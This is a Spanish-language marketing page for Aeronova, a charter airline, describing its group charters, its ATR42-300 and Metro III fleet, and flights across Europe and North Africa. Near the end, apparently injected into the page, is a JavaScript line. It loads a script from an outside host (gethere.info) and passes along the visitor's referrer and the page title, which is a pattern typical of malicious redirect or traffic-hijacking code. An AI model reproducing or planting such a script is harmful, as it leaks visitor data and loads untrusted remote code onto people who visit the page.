Pasaje Aeronova

pasaje

Cuando se transportan grupos de personas la organización puede ser muy complicada, teniendo a tu disposición tu propio avión estos problemas pueden ser solucionados mucho más fácilmente dejándote tiempo para concentrarte en la razón de tu viaje. El avión espera por ti, puedes llegar tarde o adelantar el vuelo si lo deseas.

Con casi 20 años de experiencia haciendo Charters, como cliente te puedes beneficiar de nuestro saber hacer. Un equipo especialista 24/7, te ayudará en encontrar la mejor de las soluciones con nuestra flota de ATR42-300 hasta 48 asientos o con nuestros Metros III Heavy hasta 19 asientos.

Operamos en toda Europa y Norte de África haciendo aerotaxis, transporte sanitario, incentivos, aerobús y subcharters a aerolíneas.

El charter te proporciona flexibilidad y la posibilidad de personalizarlo. Puedes decidir desde donde quieres volar, a la hora que necesites y un con un servicio a bordo personalizado.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Partners:
enisa. Ministerio de Industria, Energía y turismo
© 2014 aeronova | nota legal